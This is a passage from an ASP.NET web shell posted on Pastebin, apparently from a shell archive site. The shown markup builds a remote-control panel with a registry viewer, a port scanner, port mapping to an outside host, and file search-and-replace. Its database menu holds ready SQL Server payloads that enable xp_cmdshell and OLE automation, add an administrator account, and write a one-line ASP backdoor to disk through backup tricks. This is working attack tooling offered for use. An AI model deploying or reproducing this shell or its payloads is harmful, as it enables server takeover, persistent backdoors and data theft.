  2498. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2499. <tr align="center">
  2500. <td style="width:30%"></td>
  2501. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
  2502. <td style="width:30%"></td>
  2503. </tr>
  2504. </table>
  2505. </div>
  2506. </div>
  2507. <%--Reg--%>
  2508. <div id="kkHN" runat="server">
  2509. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
  2510. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2511. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
  2512. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
  2513. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
  2514. </asp:Table>
  2515. </table>
  2516. </div>
  2517. <%--PortScan--%>
  2518. <div id="YwLB" runat="server">
  2519. <p>
  2520. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
  2521. </p>
  2522. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
  2523. </div>
  2524. <%--DataBase--%>
  2525. <div id="iDgmL" runat="server">
  2526. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
  2527. <div id="dQIIF" runat="server">
  2528. <div id="irTU" runat="server"></div>
  2529. <div id="uXevN" runat="server">
  2530. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
  2531. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
  2532. </div>
  2533. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
  2534. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
  2535. <div style="overflow-x:auto;width:950px" >
  2536. <p>
  2537. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
  2538. </p>
  2539. </div>
  2540. </div>
  2541. </div>
  2542. <%--PortMap--%>
  2543. <div id="hOWTm" runat="server">
  2544. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2545. <tr align="center">
  2546. <td style="width:5%"></td>
  2547. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
  2548. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
  2549. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
  2550. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
  2551. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
  2552. <%--Search--%>
  2553. <div id="yhv" runat="server">
  2554. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2555. <tr align="center">
  2556. <td style="width:20%" align="left">Keyword</td>
  2557. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2558. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
  2559. </tr>
  2560. <tr align="center">
  2561. <td style="width:20%" align="left">Replace As</td>
  2562. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2563. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
  2564. </tr>
  2565. <tr align="center">
  2566. <td style="width:20%" align="left">Search FileType</td>
  2567. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
  2568. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
  2569. </tr>
  2570. <tr align="center">
  2571. <td style="width:20%" align="left">Path</td>
  2572. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
  2573. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
  2574. </tr>
  2575. </table>
  2576. <br/>
  2577. <br/>
  2578. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
  2579. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
  2580. </asp:Table>
  2581. </div>
  2582. </td></tr></table>
  2583. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.hackerbox.net" target="_blank">Shell Arsivi</a> All Rights Reserved.</div></div>
  2584. </form>
  2585. </body>
  2586. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top